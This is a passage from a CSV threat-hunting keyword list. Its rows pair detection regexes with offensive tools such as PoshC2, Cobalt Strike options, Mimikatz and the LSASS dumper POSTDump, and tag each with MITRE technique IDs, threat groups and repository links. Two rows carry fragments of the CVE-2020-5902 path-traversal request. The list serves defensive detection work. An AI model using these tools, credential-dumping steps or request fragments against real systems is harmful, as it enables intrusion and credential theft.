*nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55080" "*posh-cookie-decryptor*",".{0,1000}posh\-cookie\-decryptor.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55081" "*posh-delete *",".{0,1000}posh\-delete\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - 
TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55082" "*Poshito-C2 agent builder*",".{0,1000}Poshito\-C2\sagent\sbuilder.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#content","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","55083" "*poshkatz.psd1*",".{0,1000}poshkatz\.psd1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/Stealthbits/poshkatz","1","1","N/A","N/A","10","3","212","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z","55084" 
"*posh-project *",".{0,1000}posh\-project\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55085" "*posh-project -*",".{0,1000}posh\-project\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55086" "*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55087" "*posh-server -*",".{0,1000}posh\-server\s\-.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. 
DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55088" "*posh-update *",".{0,1000}posh\-update\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55089" "*Possible Password found in Registry Key: *",".{0,1000}Possible\sPassword\sfound\sin\sRegistry\sKey\:\s.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential 
Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","55090" "*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*",".{0,1000}POST\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileSave\.jsp.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","55091" "*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*",".{0,1000}POST\s.{0,1000}fileName\=\/tmp\/1\.txt\&content\=CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","55092" "*post/windows/gather*",".{0,1000}post\/windows\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55093" "*post/windows/gather/credentials/vnc*",".{0,1000}post\/windows\/gather\/credentials\/vnc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55094" "*post_breach_handler.py*",".{0,1000}post_breach_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","55095" "*post_ex_amsi_disable*",".{0,1000}post_ex_amsi_disable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55096" "*post_ex_keylogger*",".{0,1000}post_ex_keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55097" "*post_ex_obfuscate*",".{0,1000}post_ex_obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth 
Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55098" "*Post_EX_Process_Name*",".{0,1000}Post_EX_Process_Name.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","55099" "*post_ex_smartinject*",".{0,1000}post_ex_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55100" "*post_ex_spawnto_x64*",".{0,1000}post_ex_spawnto_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55101" "*post_ex_spawnto_x86*",".{0,1000}post_ex_spawnto_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile 
generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","55102" "*POST_EXPLOIT_DIR*",".{0,1000}POST_EXPLOIT_DIR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","55103" 
"*post_exploitation.py*",".{0,1000}post_exploitation\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","55104" "*POSTDump*PROCEXP.sys*",".{0,1000}POSTDump.{0,1000}PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55105" "*PostDump.exe *",".{0,1000}PostDump\.exe\s.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55106" "*POSTDump.git*",".{0,1000}POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55107" "*PostDump.ps1",".{0,1000}PostDump\.ps1","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55108" "*POSTDump\Postdump.cs*",".{0,1000}POSTDump\\Postdump\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform 
minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55109" "*POSTDump\PROCEXP.sys*",".{0,1000}POSTDump\\PROCEXP\.sys.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","55110" "*POSTDump-main*",".{0,1000}POSTDump\-main.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - 